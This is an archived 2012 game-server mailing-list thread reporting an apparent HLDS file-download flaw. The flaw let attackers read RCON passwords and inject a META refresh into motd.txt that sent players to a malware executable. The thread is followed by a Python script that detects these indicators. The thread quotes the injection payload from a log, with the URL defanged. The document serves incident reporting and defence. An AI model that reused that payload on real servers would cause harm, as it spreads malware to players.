I use no tcadmin or any control panel for that matter. It is not a control 
panel vulnerability, it is an exploit for HLDS. I had the exact same issue. 
However, Alfred said that the latest update fixed this exploit. I have updated 
my servers and have yet to see a similar problem come up. Will email back if it 
happens again.



________________________________
 From: Ken Bateman <[email protected]>
To: Half-Life dedicated Linux server mailing list 
<[email protected]> 
Sent: Tuesday, July 3, 2012 1:05:42 PM
Subject: Re: [hlds_linux] HLDS q3dirtrav-like exploit
 
For quite a while we have been careful to specify our tf2 rcon passwords on
the command line, not a config file, because we suspected the existence of
an exploit like this.

It's possible that the vulnerability might be in tcadmin.

-Ken
On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote:

> There is an exploit in q3 engine named "q3dirtrav", which allows players
> to download any of server files, including server configuration
> (server.cfg).
>
> Today I found evidence of possible existence of the same exploit in HLDS.
>
> As a company we host hundreds of servers. We received many reports from
> our customers about strange HTTP refresh meta tag in the motd.txt of their
> servers, which leads to "http *//free -leaks *com/cstrike*exe".
>
> The problem has affected several different servers, unrelated to each
> other, with very different RCON passwords (but most were very strong).
>
> Here's what I have found in logfiles:
>
> Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">
>
> This "cstrike.exe" contains some kind of a virus.
> (Note: I've replaced dot with asterisk and spaces)
>
> As you can see the attacker knew the RCON password of each server.
>
> Then I found "server.CFG.ztmp" file in cstrike of each server, which was
> attacked.
>
> For me that means that the attacker was able to download server.cfg
> exactly the same way as maps, models or sounds.
> _______________________________________________
> To unsubscribe, edit your list preferences, or view the list archives,
> please visit:
> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
>
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please 
visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
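
A detection sketch for the two indicators reported in this thread (an RCON `motd_write` carrying a META refresh, and a leftover `*.cfg.ztmp` file). This is an added example, not code from the posters or from Valve. The log line shape is assumed from the quoted excerpt; the sample log, IP addresses, URL and function names are constructed for illustration.

```python
import html
import os
import re

# Assumed line shape, from the excerpt quoted in the thread:
#   Rcon from IP:PORT:rcon CHALLENGE PASSWORD COMMAND [ARGS]
RCON_RE = re.compile(
    r'Rcon from\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+):\s*'
    r'rcon[ \t]+(?P<challenge>\d+)[ \t]+(?:"[^"]*"|\S+)[ \t]+'
    r'(?P<cmd>\w+)[ \t]*(?P<args>[^\r\n]*)')
# Markup that makes the MOTD window navigate away or load content
ACTIVE_HTML_RE = re.compile(
    r'<\s*(meta|script|iframe|object|embed)\b|http-equiv', re.I)

# Constructed sample log (documentation IP ranges, placeholder URL)
SAMPLE_LOG = '''\
Rcon from 203.0.113.7:15518:rcon 1399145428 REDACTED motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://example.invalid/file.exe">
Rcon from 198.51.100.4:27005:rcon 88231 REDACTED status
Rcon from 198.51.100.4:27005:rcon 88232 REDACTED motd_write Welcome to the server
'''

def suspicious_rcon(log_text):
    """Return (ip, command, reason) tuples; the RCON password is never captured."""
    hits = []
    for m in RCON_RE.finditer(log_text):
        cmd = m['cmd'].lower()
        args = html.unescape(m['args'])  # some archives store < > as entities
        if cmd == 'motd_write' and ACTIVE_HTML_RE.search(args):
            hits.append((m['ip'], cmd, 'active HTML written to MOTD'))
    return hits

def leftover_cfg_temp_files(root):
    """Find *.cfg.ztmp files (any letter case), the artifact named in the thread."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        found += [os.path.join(dirpath, name) for name in files
                  if name.lower().endswith('.cfg.ztmp')]
    return sorted(found)

if __name__ == '__main__':
    for ip, cmd, reason in suspicious_rcon(SAMPLE_LOG):
        print(f'{ip}: {cmd}: {reason}')
    for path in leftover_cfg_temp_files('.'):
        print(f'leftover config temp file: {path}')
```

A hit from either function is a reason to rotate the RCON password and restore motd.txt from a known-good copy.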